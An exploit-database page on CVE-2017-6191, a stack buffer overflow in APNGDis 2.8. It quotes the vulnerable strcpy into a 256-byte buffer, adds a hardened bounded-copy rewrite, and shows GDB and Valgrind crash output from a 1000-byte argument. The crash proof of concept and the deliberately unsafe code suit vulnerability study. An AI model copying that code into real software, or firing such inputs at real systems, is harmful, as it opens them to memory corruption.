| Title | Published | Views | Reporter |
|---|---|---|---|
| APNGDis 2.8 - filename Stack Buffer Overflow Exploit | 22 Mar 2017 00:00 | – | zdt |
| APNGDis 2.8 - chunk size descriptor Heap Buffer Overflow Exploit | 22 Mar 2017 00:00 | – | zdt |
| APNGDis Buffer Overflow Vulnerability | 23 Mar 2017 00:00 | – | cnvd |
| CVE-2017-6191 | 23 Mar 2017 16:00 | – | cve |
| CVE-2017-6191 | 23 Mar 2017 16:00 | – | cvelist |
| EUVD-2017-15256 | 7 Oct 2025 00:30 | – | euvd |
| EUVD-2017-15257 | 7 Oct 2025 00:30 | – | euvd |
| APNGDis 2.8 - filename Stack Buffer Overflow (PoC) | 14 Mar 2017 00:00 | – | exploitpack |
| CVE-2017-6191 | 23 Mar 2017 16:59 | – | nvd |
| CVE-2017-6191 | 23 Mar 2017 16:59 | – | osv |
# Exploit Title: APNGDis filename Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6191
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow
Textbook buffer overflow: a fixed-size buffer is allocated as szPath[256], and the first command-line argument is copied into it with strcpy without any length validation.
```cpp
// Excerpt from apngdis.cpp (2.8), main(): only the lines relevant to the overflow are shown.
#include <cstdio>
#include <cstring>
#include <vector>

int main(int argc, char** argv)
{
    unsigned int i, j;
    char * szInput;
    char * szOutPrefix;
    char szPath[256];                 // fixed-size destination buffer
    char szOut[256];
    std::vector<APNGFrame> frames;    // APNGFrame is defined elsewhere in apngdis.cpp
    printf("\nAPNG Disassembler 2.8\n\n");
    if (argc > 1)
        szInput = argv[1];            // attacker-controlled, length never checked
    else
    {
        printf("Usage: apngdis anim.png [name]\n");
        return 1;
    }
    strcpy(szPath, szInput);          // unbounded copy: anything past 255 bytes overruns szPath
    // ... remainder of main() omitted ...
}
```
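A hardened form of the argument handling above, written as an added example for this page rather than taken from the advisory or from APNGDis itself: the copy into the 256-byte buffer is refused when the argument does not fit, so an over-long argv[1] produces a clean error instead of a stack overwrite. The names copy_path_checked, parse_input_path and accepts_input_of_length are this example's own, and the test inputs it builds are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define PATH_BUF 256   /* same capacity as szPath[256] in apngdis.cpp */

/* Bounded length: scans at most `limit` bytes, so an over-long argument is never
   read beyond the point where it is already known not to fit. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened replacement for strcpy(szPath, szInput) (example helper, not APNGDis code).
   Returns 0 and copies src including its NUL only if it fits in dst;
   returns -1 and leaves dst untouched otherwise. */
int copy_path_checked(char *dst, size_t dst_len, const char *src)
{
    if (dst == NULL || src == NULL || dst_len == 0)
        return -1;
    size_t n = bounded_len(src, dst_len);
    if (n >= dst_len)              /* needs n + 1 bytes, only dst_len available */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Argument handling mirroring apngdis main(): argv[1] is validated before it
   reaches the fixed-size buffer. Returns 0 on success, 1 for usage, 2 if too long. */
int parse_input_path(int argc, char **argv, char *out, size_t out_len)
{
    if (argc < 2)
        return 1;
    if (copy_path_checked(out, out_len, argv[1]) != 0) {
        fprintf(stderr, "input path too long (max %zu bytes)\n", out_len - 1);
        return 2;
    }
    return 0;
}

/* Constructed check: build an argument of `len` 'A' bytes (the advisory's crash input
   is 1000 of them) and report 1 if the checked copy accepts it into a PATH_BUF
   buffer, 0 if it is rejected. */
int accepts_input_of_length(size_t len)
{
    char src[2048];
    char dst[PATH_BUF];
    if (len >= sizeof src)
        return 0;
    memset(src, 'A', len);
    src[len] = '\0';
    memset(dst, 0, sizeof dst);
    return copy_path_checked(dst, sizeof dst, src) == 0;
}

int main(int argc, char **argv)
{
    char szPath[PATH_BUF];
    int rc = parse_input_path(argc, argv, szPath, sizeof szPath);
    if (rc == 1) {
        printf("Usage: apngdis anim.png [name]\n");
        return 1;
    }
    if (rc != 0)
        return rc;
    printf("Reading '%s'\n", szPath);
    return 0;
}
```

Run with a 1000-byte argument and the program exits with status 2 and an error on stderr; a 255-byte name is the longest that is accepted, because the terminating NUL must also fit. The same bounded-copy pattern applies to szOut, which is filled from argv[2] further down in the original main().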
With 'A' * 1000 as argv[1]:

GDB:

```
Program received signal SIGSEGV, Segmentation fault.
strlen () at ../sysdeps/x86_64/strlen.S:106
106 ../sysdeps/x86_64/strlen.S: No such file or directory.
(gdb) i r
rax            0x4141414141414141 4702111234474983745
rbx            0x7ffff70ea600     140737338320384
rcx            0x141              321
rdx            0x0                0
rsi            0x7fffffffca40     140737488341568
rdi            0x4141414141414141 4702111234474983745
rbp            0x7fffffffceb0     0x7fffffffceb0
rsp            0x7fffffffc948     0x7fffffffc948
r8             0x4141414141414141 4702111234474983745
r9             0x9                9
r10            0x73               115
r11            0x7fffffffce78     140737488342648
r12            0x555555558c9f     93824992251039
r13            0x7fffffffcec8     140737488342728
r14            0x0                0
r15            0xffffffffffffffff -1
rip            0x7ffff6dd1486     0x7ffff6dd1486 <strlen+38>
eflags         0x10297            [ CF PF AF SF IF RF ]
```
Valgrind:

```
==10685== Invalid read of size 1
==10685==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685==    by 0x5B711F8: printf (printf.c:33)
==10685==    by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685==    by 0x10B24E: main (apngdis.cpp:498)
==10685==  Address 0x4141414141414141 is not stack'd, malloc'd or (recently) free'd
==10685==
==10685==
==10685== Process terminating with default action of signal 11 (SIGSEGV)
==10685==  General Protection Fault
==10685==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==10685==    by 0x5B6ADA2: vfprintf (vfprintf.c:1637)
==10685==    by 0x5B711F8: printf (printf.c:33)
==10685==    by 0x109F05: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:200)
==10685==    by 0x10B24E: main (apngdis.cpp:498)
Reading '==10685==
==10685== HEAP SUMMARY:
==10685==     in use at exit: 0 bytes in 0 blocks
==10685==   total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated
==10685==
==10685== All heap blocks were freed -- no leaks are possible
```